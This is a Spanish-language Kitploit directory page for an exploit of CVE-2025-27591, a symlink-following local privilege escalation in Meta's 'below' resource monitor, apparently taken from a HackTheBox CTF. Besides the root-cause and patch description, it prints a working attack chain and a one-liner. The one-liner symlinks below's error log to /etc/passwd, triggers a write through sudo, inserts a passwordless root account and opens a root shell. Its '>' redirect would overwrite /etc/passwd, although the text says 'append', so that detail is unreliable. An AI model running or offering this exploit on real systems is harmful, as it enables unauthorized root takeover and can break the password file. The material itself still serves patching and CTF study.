Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – Meta below: escalada de privilegios local mediante seguimiento de enlaces simbólicos (CTF de HackTheBox) | Kitploit
Herramientas/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralCTFExplotación de Binarios
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta below: escalada de privilegios local mediante seguimiento de enlaces simbólicos (CTF de HackTheBox)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 mesesAún no revisado

CVE-2025-27591 — Escalada de privilegios local por symlink en Meta below

Descripción general

CampoDetalles
CVECVE-2025-27591
SoftwareMeta below (monitor de recursos del sistema)
Versiones afectadas< 0.9.0
VulnerabilidadSeguimiento de symlink → sobrescritura arbitraria de archivos como root
AutenticaciónUsuario local con acceso sudo a below
ImpactoEscalada de privilegios local a root
ContextoDescubierto durante el CTF de HackTheBox

Descripción

La herramienta de monitoreo de recursos del sistema below (de Meta Platforms, Inc.) contiene una falla en su mecanismo de registro de errores. Cuando se invoca mediante sudo, establece forzosamente permisos 0666 en sus archivos de registro ubicados en /var/log/below/ sin verificar primero si la ruta de destino es un symlink. Esto permite a un atacante local reemplazar el archivo de registro con un symlink que apunte a cualquier archivo escribible por root, sobrescribiéndolo efectivamente con contenido controlado.

Detalles técnicos

Causa raíz

El código de registro en below < 0.9.0 realiza estas operaciones en secuencia cuando se ejecuta como root:

  1. Determina la ruta del registro: /var/log/below/error_root.log
  2. Crea o abre el archivo
  3. Llama a chmod(path, 0o666) — sin comprobar si es un symlink
  4. Escribe el mensaje de error en la ruta

En el paso 4, si la ruta fue reemplazada por un symlink antes de la ejecución, la escritura va al destino del symlink en su lugar.

Cadena de explotación

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

Por qué funciona --time "invalid"

Pasar una cadena de tiempo no válida obliga a below a registrar un mensaje de error. La ruta de error llega al código de registro que escribe ciegamente en el archivo, que ahora es nuestro symlink.

Uso

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Requisito previo: El usuario actual debe tener derechos sudo para ejecutar /usr/bin/below.

Una línea

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Prueba de concepto

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Parche

La vulnerabilidad se corrigió en la versión 0.9.0 de below. La corrección introduce una comprobación de symlink antes de cualquier operación de archivos en la ruta de registro.

Referencias

  • Entrada NVD
  • Meta below GitHub
Descargar herramienta